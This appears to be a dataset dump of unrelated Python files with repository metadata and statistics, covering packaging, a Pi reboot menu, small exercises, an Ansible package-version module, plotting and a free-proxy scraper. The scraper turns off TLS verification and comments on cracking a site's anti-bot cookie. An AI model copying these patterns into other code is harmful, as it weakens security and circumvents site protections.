columnpicker.second_measurment.hide()
else:
columnpicker.second_measurment.show()
| 29.952381 | 144 | 0.621092 | 421 | 3,774 | 5.425178 | 0.308789 | 0.043345 | 0.063047 | 0.044658 | 0.109457 | 0.064799 | 0.064799 | 0.064799 | 0.064799 | 0.048161 | 0 | 0.015267 | 0.236354 | 3,774 | 125 | 145 | 30.192 | 0.777238 | 0.052464 | 0 | 0.119266 | 0 | 0 | 0.392958 | 0.006197 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036697 | false | 0 | 0.018349 | 0 | 0.055046 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e91dfb90c4fe4bfe8c34531aaadba87573629d2 | 980 | py | Python | setup.py | michaelremington2/uumarrty | 4c48b496e09429eb6777f9dececa7c7be203cc8c | [
"BSD-3-Clause"
] | null | null | null | setup.py | michaelremington2/uumarrty | 4c48b496e09429eb6777f9dececa7c7be203cc8c | [
"BSD-3-Clause"
] | null | null | null | setup.py | michaelremington2/uumarrty | 4c48b496e09429eb6777f9dececa7c7be203cc8c | [
"BSD-3-Clause"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name='uumarrty',
version='0.0.1',
url='https://github.com/michaelremington2/uumarrty',
author='Michael Remington and Jeet Sukumaran',
author_email='michaelremington2@gmail.com',
license="LICENSE.txt",
classifiers=[
"Intended Audience :: Science/Research",
"License :: OSI Approved :: BSD License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
],
scripts=[
"bin/simulate_uumarrty.py",
],
test_suite = "tests",
package_dir={"": "src"},
description="Agent based simulation of predator prey dynamics.",
long_description=long_description,
long_description_content_type="text/markdown",
packages=find_packages(where="src"),
python_requires=">=3.6",
) | 28.823529 | 68 | 0.656122 | 110 | 980 | 5.727273 | 0.754545 | 0.095238 | 0.060317 | 0.095238 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011392 | 0.193878 | 980 | 34 | 69 | 28.823529 | 0.786076 | 0.043878 | 0 | 0.071429 | 0 | 0 | 0.443376 | 0.054487 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.035714 | 0 | 0.035714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e948cdbd864ca7d68940aa639d8604501f00bc5 | 683 | py | Python | RackPi/Pages/Reboot.py | DarkIrata/rackpi | e588f9b42ae55c8a763ce9e7a953e29f25e696b3 | [
"MIT"
] | null | null | null | RackPi/Pages/Reboot.py | DarkIrata/rackpi | e588f9b42ae55c8a763ce9e7a953e29f25e696b3 | [
"MIT"
] | null | null | null | RackPi/Pages/Reboot.py | DarkIrata/rackpi | e588f9b42ae55c8a763ce9e7a953e29f25e696b3 | [
"MIT"
] | null | null | null | from Data.Drawer import Drawer
from Data.Helper import *
from Pages.PageBase import PageBase
class Reboot(PageBase):
def __init__(self, drawer: Drawer):
PageBase.__init__(self, drawer)
def UpdateCanvas(self):
if not self.CanUpdate(100):
return
self.drawer.ClearCanvas()
self.drawer.WriteOnCanvas(".......Reboot.......", line=0)
self.drawer.WriteOnCanvas(" Hold Button ", line=1)
self.drawer.WriteOnCanvas(" To Reboot ", line=2)
def OnLongPress(self):
self.drawer.ClearCanvas()
cmd = "sudo reboot now"
print("REBOOT")
subprocess.Popen(cmd, shell = True) | 31.045455 | 65 | 0.610542 | 75 | 683 | 5.453333 | 0.48 | 0.171149 | 0.168704 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011976 | 0.266471 | 683 | 22 | 66 | 31.045455 | 0.804391 | 0 | 0 | 0.111111 | 0 | 0 | 0.116959 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.444444 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e98c19a9f41dbb82f2ec64a837df13e0499732e | 380 | py | Python | ex018.py | Gustavo-Dev-Web/python | 88c9a51cba5290d1dcfce8ea9481ed4749503f68 | [
"MIT"
] | null | null | null | ex018.py | Gustavo-Dev-Web/python | 88c9a51cba5290d1dcfce8ea9481ed4749503f68 | [
"MIT"
] | null | null | null | ex018.py | Gustavo-Dev-Web/python | 88c9a51cba5290d1dcfce8ea9481ed4749503f68 | [
"MIT"
] | null | null | null | from math import radians, sin, cos, tan
angulo = float(input('Digite o ângulo que você deseja: '))
seno = sin(radians(angulo))
cosseno = cos(radians(angulo))
tangente = tan(radians(angulo))
print(f'O ângulo de {angulo} tem o SENO de {seno :.2f}!')
print(f'O ângulo de {angulo} tem o COSSENO de {cosseno :.2f}!')
print(f'O ângulo de {angulo} tem a TANGENTE de {tangente :.2f}!')
| 34.545455 | 65 | 0.694737 | 64 | 380 | 4.125 | 0.390625 | 0.106061 | 0.079545 | 0.147727 | 0.295455 | 0.295455 | 0.295455 | 0.295455 | 0 | 0 | 0 | 0.009288 | 0.15 | 380 | 10 | 66 | 38 | 0.80805 | 0 | 0 | 0 | 0 | 0 | 0.494737 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.375 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e9b97604a5cb5368bd271887ae7d926ada9d2f3 | 685 | py | Python | LeetCode/python/061-090/086-partition-list/solution.py | shootsoft/practice | 49f28c2e0240de61d00e4e0291b3c5edd930e345 | [
"Apache-2.0"
] | null | null | null | LeetCode/python/061-090/086-partition-list/solution.py | shootsoft/practice | 49f28c2e0240de61d00e4e0291b3c5edd930e345 | [
"Apache-2.0"
] | null | null | null | LeetCode/python/061-090/086-partition-list/solution.py | shootsoft/practice | 49f28c2e0240de61d00e4e0291b3c5edd930e345 | [
"Apache-2.0"
] | null | null | null | __author__ = 'yinjun'
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
# @param head, a ListNode
# @param x, an integer
# @return a ListNode
def partition(self, head, x):
h1 = ListNode(0)
h2 = ListNode(0)
h1h = h1
h2h = h2
h = head
while h != None:
if h.val < x :
h1.next = ListNode(h.val)
h1 = h1.next
else:
h2.next = ListNode(h.val)
h2 = h2.next
h = h.next
h1.next = h2h.next
return h1h.next
| 18.513514 | 41 | 0.464234 | 83 | 685 | 3.73494 | 0.39759 | 0.03871 | 0.083871 | 0.103226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043928 | 0.435037 | 685 | 36 | 42 | 19.027778 | 0.757106 | 0.272993 | 0 | 0 | 0 | 0 | 0.01227 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e9d1f88f2018b598e87d9922395a3eec689c6a1 | 2,389 | py | Python | jasonhelper/__init__.py | jbkoh/jason_python_helper | 6a9d8e31d070b5adb827ba96887db24cb431b94e | [
"MIT"
] | null | null | null | jasonhelper/__init__.py | jbkoh/jason_python_helper | 6a9d8e31d070b5adb827ba96887db24cb431b94e | [
"MIT"
] | 1 | 2017-10-12T23:01:32.000Z | 2017-11-21T06:44:07.000Z | jasonhelper/__init__.py | jbkoh/jason_python_helper | 6a9d8e31d070b5adb827ba96887db24cb431b94e | [
"MIT"
] | 1 | 2018-09-19T15:12:57.000Z | 2018-09-19T15:12:57.000Z | import argparse
import os
import time
## Argparser
def str2slist(s):
s.replace(' ', '')
return s.split(',')
def str2ilist(s):
s.replace(' ', '')
return [int(c) for c in s.split(',')]
def str2bool(v):
if v in ['true', 'True']:
return True
elif v in ['false', 'False']:
return False
else:
assert(False)
argparser = argparse.ArgumentParser()
argparser.register('type','bool',str2bool)
argparser.register('type','slist', str2slist)
argparser.register('type','ilist', str2ilist)
# Adopted from: http://stackoverflow.com/a/8412405
def rolling_window(l, w_size):
for i in range(len(l)-w_size+1):
yield [l[i+o] for o in range(w_size)]
def striding_windows(l, w_size):
curr_idx = 0
while curr_idx < len(l):
yield l[curr_idx:curr_idx + w_size]
curr_idx += w_size
def check_and_create_dir(dir_path):
if not os.path.exists(dir_path):
os.makedirs(dir_path)
# Adopted from: https://stackoverflow.com/a/21894086
class bidict(dict):
def __init__(self, *args, **kwargs):
super(bidict, self).__init__(*args, **kwargs)
self.inverse = {}
for key, value in self.items():
self.inverse.setdefault(value,[]).append(key)
def __setitem__(self, key, value):
if key in self:
self.inverse[self[key]].remove(key)
super(bidict, self).__setitem__(key, value)
self.inverse.setdefault(value,[]).append(key)
def __delitem__(self, key):
self.inverse.setdefault(self[key],[]).remove(key)
if self[key] in self.inverse and not self.inverse[self[key]]:
del self.inverse[self[key]]
super(bidict, self).__delitem__(key)
def chunks(l, n):
"""Yield successive n-sized chunks from l."""
for i in range(0, len(l), n):
yield l[i:i + n]
class FtnTimer(object):
def __init__(self):
self.tot_time = 0
self.tot_cnt = 0
self.curr_time = 0
def start(self):
self.start_time = time.clock()
def end(self):
end_time = time.clock()
self.tot_time += end_time - self.start_time
self.tot_cnt += 1
def get_result(self):
if not self.tot_cnt:
avg_time = None
else:
avg_time = self.tot_time / self.tot_cnt
res = {
'average_time': avg_time
}
return res
| 25.688172 | 69 | 0.601925 | 334 | 2,389 | 4.113772 | 0.296407 | 0.064047 | 0.029112 | 0.039301 | 0.055313 | 0.055313 | 0.055313 | 0 | 0 | 0 | 0 | 0.015792 | 0.257848 | 2,389 | 92 | 70 | 25.967391 | 0.759165 | 0.062788 | 0 | 0.085714 | 0 | 0 | 0.026906 | 0 | 0 | 0 | 0 | 0 | 0.014286 | 1 | 0.2 | false | 0 | 0.042857 | 0 | 0.342857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e9d9a8e7ebad14756d858c92a15d00b8f0de94b | 2,983 | py | Python | data_evaluation.py | portaloffreedom/reinforcement-learning-in-rust | 470a8b6486a2c83dccbab9a0ef4bfd020e975d56 | [
"MIT"
] | null | null | null | data_evaluation.py | portaloffreedom/reinforcement-learning-in-rust | 470a8b6486a2c83dccbab9a0ef4bfd020e975d56 | [
"MIT"
] | null | null | null | data_evaluation.py | portaloffreedom/reinforcement-learning-in-rust | 470a8b6486a2c83dccbab9a0ef4bfd020e975d56 | [
"MIT"
] | null | null | null | # Download data, unzip, etc.
from matplotlib import pyplot as plt
import pandas as pd
import numpy as np
import scipy.stats as st
# Set some parameters to apply to all plots. These can be overridden
# in each plot if desired
import matplotlib
# Plot size to 14" x 7"
matplotlib.rc('figure', figsize = (14, 7))
# Font size to 14
matplotlib.rc('font', size = 14)
# Do not display top and right frame lines
matplotlib.rc('axes.spines', top = False, right = False)
# Remove grid lines
matplotlib.rc('axes', grid = False)
# Set backgound color to white
matplotlib.rc('axes', facecolor = 'white')
_, ax = plt.subplots()
# Define a function for the line plot with intervals
def lineplotCI(x_data, y_data, low_CI, upper_CI, minimum, maximum, x_label, y_label, title, color, file_name):
# Create the plot object
# Plot the data, set the linewidth, color and transparency of the
# line, provide a label for the legend
ax.plot(x_data, y_data, lw = 3, color = color, alpha = 1, label = file_name)
ax.plot(x_data, minimum, lw=1, color=color, alpha=1, label='5% quantile')
ax.plot(x_data, maximum, lw=1, color=color, alpha=1, label='95% quantile')
# Shade the confidence interval
ax.fill_between(x_data, low_CI, upper_CI, color=color, alpha=0.1, label='25-75 quantile')
# Label the axes and provide a title
ax.set_title(title)
ax.set_xlabel(x_label)
ax.set_ylabel(y_label)
# Display legend
ax.legend(loc = 'best')
def add_plot(csv_name, color):
dataset = pd.read_csv(csv_name, header=None)
mean = dataset.mean(axis=0)
std = dataset.std(axis=0)
upper = mean + std
lower = mean - std
upper_quantile = dataset.quantile(0.75)
median = dataset.quantile(0.5)
lower_quantile = dataset.quantile(0.25)
max_quantile = dataset.quantile(0.95)
min_quantile = dataset.quantile(0.05)
lower_interval, upper_interval = st.t.interval(0.95, 99, loc=mean, scale=std)
# Call the function to create plot
# lineplotCI(x_data = list(range(0, 400))
# , y_data = median
# , low_CI=lower_quantile
# , upper_CI=upper_quantile
# , minimum = min_quantile
# , maximum = max_quantile
# , x_label='Episodes'
# , y_label='Value of Policy'
# , title='Value of policy over time'
# , color=color)
lineplotCI(x_data=list(range(0, 400))
, y_data=mean
, low_CI=lower
, upper_CI=upper
, minimum=min_quantile
, maximum=max_quantile
, x_label='Episodes'
, y_label='Value of Policy'
, title='Value of policy over time'
, file_name=csv_name
, color=color)
# add_plot("q_learning_epsilon_rewards.csv", '#539caf')
add_plot("q_learning_epsilon_rewards.csv", '#999111')
add_plot("double_q_epsilon_rewards.csv", '#990a11')
plt.show() | 33.516854 | 111 | 0.638284 | 430 | 2,983 | 4.27907 | 0.327907 | 0.019022 | 0.043478 | 0.052174 | 0.229891 | 0.201087 | 0.201087 | 0.13913 | 0.13913 | 0.103261 | 0 | 0.03048 | 0.252095 | 2,983 | 89 | 112 | 33.516854 | 0.794263 | 0.315454 | 0 | 0 | 0 | 0 | 0.096822 | 0.028798 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.108696 | 0 | 0.152174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ea223055e4d3fcfd6d5415328c4b3e36324649c | 3,988 | py | Python | roles/openshift_health_checker/library/rpm_version.py | KoteikinyDrova/openshift-ansible | 3db2bb10c0ad5e7ed702bfccdec03562533e8539 | [
"Apache-2.0"
] | 1 | 2019-03-13T10:14:35.000Z | 2019-03-13T10:14:35.000Z | roles/openshift_health_checker/library/rpm_version.py | KoteikinyDrova/openshift-ansible | 3db2bb10c0ad5e7ed702bfccdec03562533e8539 | [
"Apache-2.0"
] | 1 | 2021-09-23T23:36:29.000Z | 2021-09-23T23:36:29.000Z | roles/openshift_health_checker/library/rpm_version.py | KoteikinyDrova/openshift-ansible | 3db2bb10c0ad5e7ed702bfccdec03562533e8539 | [
"Apache-2.0"
] | 4 | 2018-10-27T00:29:24.000Z | 2022-01-07T07:39:51.000Z | #!/usr/bin/python
"""
Ansible module for rpm-based systems determining existing package version information in a host.
"""
from ansible.module_utils.basic import AnsibleModule
IMPORT_EXCEPTION = None
try:
import rpm # pylint: disable=import-error
except ImportError as err:
IMPORT_EXCEPTION = err # in tox test env, rpm import fails
class RpmVersionException(Exception):
"""Base exception class for package version problems"""
def __init__(self, message, problem_pkgs=None):
Exception.__init__(self, message)
self.problem_pkgs = problem_pkgs
def main():
"""Entrypoint for this Ansible module"""
module = AnsibleModule(
argument_spec=dict(
package_list=dict(type="list", required=True),
),
supports_check_mode=True
)
if IMPORT_EXCEPTION:
module.fail_json(msg="rpm_version module could not import rpm: %s" % IMPORT_EXCEPTION)
# determine the packages we will look for
pkg_list = module.params['package_list']
if not pkg_list:
module.fail_json(msg="package_list must not be empty")
# get list of packages available and complain if any
# of them are missing or if any errors occur
try:
pkg_versions = _retrieve_expected_pkg_versions(_to_dict(pkg_list))
_check_pkg_versions(pkg_versions, _to_dict(pkg_list))
except RpmVersionException as excinfo:
module.fail_json(msg=str(excinfo))
module.exit_json(changed=False)
def _to_dict(pkg_list):
return {pkg["name"]: pkg for pkg in pkg_list}
def _retrieve_expected_pkg_versions(expected_pkgs_dict):
"""Search for installed packages matching given pkg names
and versions. Returns a dictionary: {pkg_name: [versions]}"""
transaction = rpm.TransactionSet()
pkgs = {}
for pkg_name in expected_pkgs_dict:
matched_pkgs = transaction.dbMatch("name", pkg_name)
if not matched_pkgs:
continue
for header in matched_pkgs:
if header['name'] == pkg_name:
if pkg_name not in pkgs:
pkgs[pkg_name] = []
pkgs[pkg_name].append(header['version'])
return pkgs
def _check_pkg_versions(found_pkgs_dict, expected_pkgs_dict):
invalid_pkg_versions = {}
not_found_pkgs = []
for pkg_name, pkg in expected_pkgs_dict.items():
if not found_pkgs_dict.get(pkg_name):
not_found_pkgs.append(pkg_name)
continue
found_versions = [_parse_version(version) for version in found_pkgs_dict[pkg_name]]
expected_version = _parse_version(pkg["version"])
if expected_version not in found_versions:
invalid_pkg_versions[pkg_name] = {
"found_versions": found_versions,
"required_version": expected_version,
}
if not_found_pkgs:
raise RpmVersionException(
'\n'.join([
"The following packages were not found to be installed: {}".format('\n '.join([
"{}".format(pkg)
for pkg in not_found_pkgs
]))
]),
not_found_pkgs,
)
if invalid_pkg_versions:
raise RpmVersionException(
'\n '.join([
"The following packages were found to be installed with an incorrect version: {}".format('\n'.join([
" \n{}\n Required version: {}\n Found versions: {}".format(
pkg_name,
pkg["required_version"],
', '.join([version for version in pkg["found_versions"]]))
for pkg_name, pkg in invalid_pkg_versions.items()
]))
]),
invalid_pkg_versions,
)
def _parse_version(version_str):
segs = version_str.split('.')
if not segs or len(segs) <= 2:
return version_str
return '.'.join(segs[0:2])
if __name__ == '__main__':
main()
| 31.15625 | 116 | 0.621364 | 476 | 3,988 | 4.926471 | 0.277311 | 0.044776 | 0.030704 | 0.021748 | 0.078465 | 0.065672 | 0.045203 | 0.045203 | 0 | 0 | 0 | 0.001054 | 0.286108 | 3,988 | 127 | 117 | 31.401575 | 0.82262 | 0.127633 | 0 | 0.137931 | 0 | 0 | 0.115753 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068966 | false | 0 | 0.08046 | 0.011494 | 0.206897 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ea5524aaaf6020d2fb120959b8bb005d31ffdc3 | 12,967 | py | Python | spider_proxy/app/managers/proxy_fetch.py | seniortesting/python-spider | 0b70817373e2e22267ddf3b80b9b7eb15931e41e | [
"MIT"
] | null | null | null | spider_proxy/app/managers/proxy_fetch.py | seniortesting/python-spider | 0b70817373e2e22267ddf3b80b9b7eb15931e41e | [
"MIT"
] | null | null | null | spider_proxy/app/managers/proxy_fetch.py | seniortesting/python-spider | 0b70817373e2e22267ddf3b80b9b7eb15931e41e | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
import logging
import re
from time import sleep
import requests
import urllib3
from app.utils.spider_utils import getHtmlTree, verifyProxyFormat
from app.utils.web_request import WebRequest
# Silence InsecureRequestWarning: some fetchers below deliberately disable
# TLS verification (see session.verify = False in FetchFreeProxy.ip66).
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
logging.basicConfig(level=logging.INFO,
                    format='[%(asctime)s.%(msecs).03d - %(filename)s:%(lineno)d %(levelname)s]: %(message)s')
# Module-level logger used by the check helpers at the bottom of the file.
log = logging.getLogger(__name__)
class FetchFreeProxy(object):
    """Scrapers for public free-proxy websites.

    Each static method is a generator yielding proxies as 'ip:port'
    strings.  Sources that have gone dead are kept commented out at the
    bottom of the class.
    """
    @staticmethod
    def ip66(count=20):
        """
        Proxy 66 http://www.66ip.cn/
        :param count: number of proxies to request
        :return: generator of 'ip:port' strings
        """
        urls = [
            "http://www.66ip.cn/nmtq.php?getnum=60&isp=0&anonymoustype=0&start=&ports=&export=&ipaddress=&area=1&proxytype=2&api=66ip"
        ]
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0',
                   'Accept': '*/*',
                   'Connection': 'keep-alive',
                   'Accept-Language': 'zh-CN,zh;q=0.8'}
        try:
            import js2py
            session = requests.Session()
            # TLS verification deliberately disabled for this source.
            session.verify = False
            # ----------------------------- 2019-08-16: earliest version
            # src = session.get("http://www.66ip.cn/", headers=headers).text
            #
            # src = src.split("</script>")[0] + '}'
            # src = src.replace("<script>", "function test() {")
            # src = src.replace("while(z++)try{eval(", ';var num=10;while(z++)try{var tmp=')
            # src = src.replace(");break}", ";num--;if(tmp.search('cookie') != -1 | num<0){return tmp}}")
            # ctx = js2py.eval_js(src)
            # src = ctx.test()
            # src = src[src.find("document.cookie="): src.find("};if((")]
            # src = src.replace("document.cookie=", "")
            # src = "function test() {var window={}; return %s }" % src
            # cookie = js2py.eval_js(src).test()
            # js_cookie = cookie.split(";")[0].split("=")[-1]
            # ----------------------------- 2019-08-16: newer site version requires cracking the cookies
            # content = ''.join(re.findall('<script>(.*?)</script>', content))
            # function_js = content.replace('eval', 'return')
            # function_content = "function getClearance(){" + function_js + "};"
            # self.context.execute(function_content)
            # # first-stage decryption result
            # decoded_result = self.context.getClearance()
            # function_js_result = 'var a' + decoded_result.split('document.cookie')[1].split("Path=/;'")[
            #                          0] + "Path=/;';return a;"
            # # s = re.sub(r'document.create.*?firstChild.href', '"{}"'.format(self.start_url), s)
            # function_content_result = "function getClearanceResult(){" + function_js_result + "};"
            # self.context.execute(function_content_result)
            # # second-stage decryption result
            # decoded_content = self.context.getClearanceResult()
            # jsl_clearance = decoded_content.split(';')[0]
        except Exception as e:
            print(e)
            return
        for url in urls:
            try:
                # cookies={"__jsl_clearance": js_cookie}
                # NOTE(review): the URL contains no '{}' placeholder, so
                # .format(count) is a no-op and `count` is effectively
                # unused — confirm whether the API's getnum should use it.
                html = session.get(url.format(count), headers=headers).text
                ips = re.findall(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}", html)
                for ip in ips:
                    yield ip.strip()
            except Exception as e:
                print(e)
                pass
    @staticmethod
    def goubanjia():
        """
        Goubanjia http://www.goubanjia.com/
        :return: generator of 'ip:port' strings
        """
        url = "http://www.goubanjia.com/"
        tree = getHtmlTree(url)
        proxy_list = tree.xpath('//td[@class="ip"]')
        # The site injects hidden digits as interference, so extra digits
        # or '.' characters may be scraped.
        # Content inside <p style="display:none;"> must be filtered out.
        xpath_str = """.//*[not(contains(@style, 'display: none'))
                                        and not(contains(@style, 'display:none'))
                                        and not(contains(@class, 'port'))
                                        ]/text()
                """
        for each_proxy in proxy_list:
            try:
                # The ':' sits directly under the td while the rest is in
                # div/span/p tags; join the filtered text to get the IP.
                ip_addr = ''.join(each_proxy.xpath(xpath_str))
                # The port shown in the HTML is a random number; the real
                # port is encoded in the letters after 'port ' in the class
                # attribute.  For example:
                # <span class="port CFACE">9054</span>
                # 'CFACE' decodes to 3128.
                port = 0
                for _ in each_proxy.xpath(".//span[contains(@class, 'port')]"
                                          "/attribute::class")[0]. \
                        replace("port ", ""):
                    port *= 10
                    port += (ord(_) - ord('A'))
                port /= 8
                yield '{}:{}'.format(ip_addr, int(port))
            except Exception as e:
                pass
    @staticmethod
    def kuaidaili():
        """
        Kuaidaili https://www.kuaidaili.com
        """
        url_list = [
            'https://www.kuaidaili.com/free/inha/',
            'https://www.kuaidaili.com/free/intr/'
        ]
        for url in url_list:
            tree = getHtmlTree(url)
            proxy_list = tree.xpath('.//table//tr')
            sleep(1)  # must sleep, otherwise the second request returns no data
            for tr in proxy_list[1:]:
                yield ':'.join(tr.xpath('./td/text()')[0:2])
    @staticmethod
    def coderbusy():
        """
        Coderbusy proxy https://proxy.coderbusy.com/
        :return: generator of 'ip:port' strings
        """
        urls = ['https://proxy.coderbusy.com/']
        for url in urls:
            tree = getHtmlTree(url)
            proxy_list = tree.xpath('.//table//tr')
            for tr in proxy_list[1:]:
                tr_data=tr.xpath('./td/text()')
                ip_port=tr_data[0:2]
                location=tr_data[-1].strip()
                # Keep only proxies whose listed location/ISP is in this
                # whitelist (Tencent Cloud, Aliyun, the three state
                # carriers and 21Vianet).
                if location in ['腾讯云','阿里云','移动','联通','电信', '世纪互联']: yield ':'.join(ip_port)
                # yield ':'.join(tr.xpath('./td/text()')[0:2])
    @staticmethod
    def ip3366():
        """
        Cloud proxy http://www.ip3366.net/free/
        :return: generator of 'ip:port' strings
        """
        urls = ['http://www.ip3366.net/free/?stype=1',
                "http://www.ip3366.net/free/?stype=2"
                ]
        request = WebRequest()
        for url in urls:
            r = request.get(url, timeout=10)
            proxies = re.findall(r'<td>(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})</td>[\s\S]*?<td>(\d+)</td>', r.text)
            for proxy in proxies:
                yield ":".join(proxy)
    @staticmethod
    def jiangxianli(page_count=2):
        """
        http://ip.jiangxianli.com/?page=
        Free proxy list
        :return: generator of 'ip:port' strings
        """
        for i in range(1, page_count + 1):
            url = 'http://ip.jiangxianli.com/?page={}'.format(i)
            html_tree = getHtmlTree(url)
            tr_list = html_tree.xpath("/html/body/div[1]/div/div[1]/div[2]/table/tbody/tr")
            if len(tr_list) == 0:
                continue
            for tr in tr_list:
                yield tr.xpath("./td[2]/text()")[0] + ":" + tr.xpath("./td[3]/text()")[0]
    @staticmethod
    def data5u():
        '''
        Data5u proxy, 10 free entries
        :return: generator of 'ip:port' strings
        '''
        url_list = [
            'http://www.data5u.com/',
        ]
        for url in url_list:
            html_tree = getHtmlTree(url)
            ul_list = html_tree.xpath('//ul[@class="l2"]')
            for ul in ul_list:
                try:
                    yield ':'.join(ul.xpath('.//li/text()')[0:2])
                except Exception as e:
                    print(e)
    @staticmethod
    def xicidaili(page_count=1):
        # Xicidaili; only the high-anonymity listing is scraped.
        url_list = [
            'http://www.xicidaili.com/nn/',  # high anonymity
        ]
        for each_url in url_list:
            for i in range(1, page_count + 1):
                page_url = each_url + str(i)
                tree = getHtmlTree(page_url)
                proxy_list = tree.xpath('.//table[@id="ip_list"]//tr[position()>1]')
                for proxy in proxy_list:
                    try:
                        yield ':'.join(proxy.xpath('./td/text()')[0:2])
                    except Exception as e:
                        pass
    # --- Dead sources kept for reference ---
    # @staticmethod
    # def proxylistplus():
    #     urls = ['https://list.proxylistplus.com/Fresh-HTTP-Proxy-List-1']
    #     request = WebRequest()
    #     for url in urls:
    #         r = request.get(url)
    #         proxies = re.findall(r'<td>(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})</td>[\s\S]*?<td>(\d+)</td>', r.text)
    #         for proxy in proxies:
    #             yield ':'.join(proxy)
    # @staticmethod
    # def iphai():
    #     """
    #     IP sea http://www.iphai.com/free/ng
    #     :return:
    #     """
    #     urls = [
    #         'http://www.iphai.com/free/ng',
    #         'http://www.iphai.com/free/np',
    #         'http://www.iphai.com/free/wg',
    #         'http://www.iphai.com/free/wp'
    #     ]
    #     request = WebRequest()
    #     for url in urls:
    #         r = request.get(url, timeout=10)
    #         proxies = re.findall(r'<td>\s*?(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s*?</td>[\s\S]*?<td>\s*?(\d+)\s*?</td>',
    #                              r.text)
    #         for proxy in proxies:
    #             yield ":".join(proxy)
    # @staticmethod
    # def ip181(days=1):
    #     url = 'http://www.ip181.com/'
    #     html_tree = getHtmlTree(url)
    #     try:
    #         tr_list = html_tree.xpath('//tr')[1:]
    #         for tr in tr_list:
    #             yield ':'.join(tr.xpath('./td/text()')[0:2])
    #     except Exception as e:
    #         pass
    # @staticmethod
    # def mimiip():
    #     url_gngao = ['http://www.mimiip.com/gngao/%s' % n for n in range(1, 10)]  # domestic high-anonymity
    #     url_gnpu = ['http://www.mimiip.com/gnpu/%s' % n for n in range(1, 10)]  # domestic anonymous
    #     url_gntou = ['http://www.mimiip.com/gntou/%s' % n for n in range(1, 10)]  # domestic transparent
    #     url_list = url_gngao + url_gnpu + url_gntou
    #
    #     request = WebRequest()
    #     for url in url_list:
    #         r = request.get(url)
    #         proxies = re.findall(r'<td>(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})</td>[\w\W].*<td>(\d+)</td>', r.text)
    #         for proxy in proxies:
    #             yield ':'.join(proxy)
    # @staticmethod
    # def xundaili():
    #     '''
    #     Xdaili
    #     :return:
    #     '''
    #     url = 'http://www.xdaili.cn/ipagent/freeip/getFreeIps?page=1&rows=10'
    #     request = WebRequest()
    #     try:
